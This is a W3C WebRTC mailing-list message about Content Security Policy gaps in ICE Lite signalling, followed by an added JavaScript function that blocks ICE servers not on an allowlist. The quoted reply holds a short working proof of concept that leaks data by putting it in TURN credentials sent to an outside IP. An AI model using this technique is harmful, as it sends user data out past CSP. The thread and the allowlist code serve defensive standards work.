- From: Iñaki Baz Castillo <ibc@aliax.net>
- Date: Fri, 12 Jan 2018 13:27:02 +0100
- To: Sergio Garcia Murillo <sergio.garcia.murillo@gmail.com>
- Cc: T H Panton <thp@westhawk.co.uk>, "public-webrtc@w3.org" <public-webrtc@w3.org>, Cullen Jennings <fluffy@iii.ca>
On 12 January 2018 at 13:06, Sergio Garcia Murillo
<sergio.garcia.murillo@gmail.com> wrote:
> On 12/01/2018 13:01, Iñaki Baz Castillo wrote:
>
> To summarize: The current issue with ICE Lite is that it's not needed
> for the browser (ICE controlling) to provide the remote with the
> browser *internally* and *dynamically* generated tokens (such as the
> ice-ufrag). With my proposal above, this would change so the JS should
> always signal its local ice-ufrag to the remote (otherwise ICE
> responses would be discarded). And for that, the JS must send it via
> HTTP/WebSocket, so habemus CSP rules to block them.
>
> As I already pointed out in the issue, it is possible to leak small amounts
> of data just with:
>
> var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
> pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

And as I already pointed out, my proposal above was just intended to
make both Full ICE and ICE Lite equally safe. :)
Leaking data via TURN credentials is a different subject (no less important).
Received on Friday, 12 January 2018 12:27:46 UTC
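
Added example, not part of the original message or of any WebRTC/CSP specification: a page-level allowlist check on `RTCConfiguration.iceServers`, the kind of restriction the thread wants CSP to be able to express for ICE server destinations. `ALLOWED_ICE_HOSTS`, `parseIceUrl`, `auditIceServers` and `guardPeerConnection` are hypothetical names, and the allowlisted hosts are constructed values.

```javascript
// Hypothetical allowlist of ICE server hosts the application may contact.
const ALLOWED_ICE_HOSTS = new Set(["turn.example.org", "stun.example.org"]); // constructed

// Parse a stun:/stuns:/turn:/turns: URI of the shape
// scheme ":" host [":" port] ["?transport=" proto]. Returns null if malformed.
function parseIceUrl(url) {
  const re = /^(stuns?|turns?):(\[[0-9a-fA-F:.]+\]|[^:?\[\]\s]+)(?::(\d{1,5}))?(?:\?transport=(udp|tcp))?$/;
  const m = re.exec(String(url));
  if (!m) return null;
  return {
    scheme: m[1],
    host: m[2].toLowerCase(),
    port: m[3] ? Number(m[3]) : null,
    transport: m[4] || null,
  };
}

// Return a list of violations; an empty list means the configuration passes.
function auditIceServers(config, allowedHosts = ALLOWED_ICE_HOSTS) {
  const violations = [];
  for (const server of (config && config.iceServers) || []) {
    // "urls" may be a single string or an array of strings.
    const urls = [].concat(server.urls || server.url || []);
    for (const url of urls) {
      const parsed = parseIceUrl(url);
      if (!parsed) {
        violations.push({ url, reason: "malformed ICE server URL" });
      } else if (!allowedHosts.has(parsed.host)) {
        violations.push({ url, reason: "host not in allowlist" });
      }
    }
  }
  return violations;
}

// Wrap a PeerConnection constructor so that a rejected configuration
// never reaches the ICE agent (no STUN/TURN packet is sent for it).
function guardPeerConnection(PeerConnection, allowedHosts = ALLOWED_ICE_HOSTS) {
  return function GuardedPeerConnection(config, ...rest) {
    const violations = auditIceServers(config, allowedHosts);
    if (violations.length > 0) {
      throw new Error("blocked ICE server: " + violations.map((v) => v.url).join(", "));
    }
    return new PeerConnection(config, ...rest);
  };
}
```

The check restricts only where ICE server traffic may go; it does not inspect `username` or `credential`, so it does not address what is sent to an allowlisted server.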